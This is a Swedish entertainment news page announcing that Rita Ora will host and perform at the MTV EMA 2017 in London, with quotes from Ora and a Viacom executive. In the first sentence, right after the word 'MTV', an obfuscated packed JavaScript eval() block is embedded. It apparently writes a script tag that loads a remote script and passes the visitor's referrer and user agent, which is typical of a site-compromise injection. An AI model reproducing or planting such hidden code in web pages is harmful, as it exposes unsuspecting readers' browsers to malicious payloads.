Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Popsensationen Rita Ora är värd för årets MTV EMA

Popsensationen Rita Ora är värd för årets MTV EMA
Sebastian

MTV eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ddfrd|var|u0026u|referrer|efsri||js|php’.split(’|’),0,{}))
avslöjar idag att den internationella popstjärnan Rita Ora värd för MTV EMA 2017 som hålls i London, Wembley SSE Arena, söndagen den 12 november kl. 21.00. Hon kommer även att uppträda på galan. 

-Jag är så peppad på att vara värd MTV EMA’s, som i år hålls i min hemstad London! Jag minns fortfarande hur kul mitt första EMA i Frankfurt 2012 var, när jag uppträdde med ”RIP”. Jag längtar tills jag står på scenen igen, både får att uppträda och leda galan, säger Rita Ora, artist och programledare för MTV EMA 2017.

Rita Ora, född i Kosovo, kommer att inta Wembley Arena för att uppträda och leda en av världens främsta musikgalor. Hon har sedan tidigare inte mindre än åtta MTV EMA nomineringar på sin meritlista, bland andra Best Video, Best Look, Best World Stage, Best UK/Ireland Act, Best New Artist och Best Push Artist. Ora haft stora internationella framgångar med hits som ”I Will Never Let You Down” (2014) och under året “Your Song”, “Girls” samt det framgångsrika samarbetet med Avicii “Lonely Together.” “Your Song” är den första singeln från Oras kommande album, som blir en uppföljare till debutalbumet ”Ora”, som har toppat listorna världen över med hitsinglar som “Hot Right Now,” “RIP” och “How We Do.” Ora har även varit coach i BBCs The Voice, jurymedlem i X Factor och programledare för America’s Next Top Model på VH1. Hon har även medverkat i filmer som Wonderwell, Fast And Furious 6, Southpaw  och Fifty Shades Of Grey.

–       Rita är en mulitbegåvad stjärna som har varit en central MTV-artist under en längre tid. Hon är den perfekta lokala hjälten att leda MTV EMA 2017, som kommer att bli den stora globala musikhändelsen i år, säger  Bruce Gillmer, Head of Music & Music Talent, Global Entertainment Group på Viacom.

Fler artister som uppträder på MTV EMAs samt presentatörer och nominerade kommer att avslöjas löpande de kommande veckorna.

I nästa vecka öppnar röstningen för MTV EMA 2017 på mtvema.com. För högupplösta bilder, pressmaterial och information, vänligen besök press.mtvema.com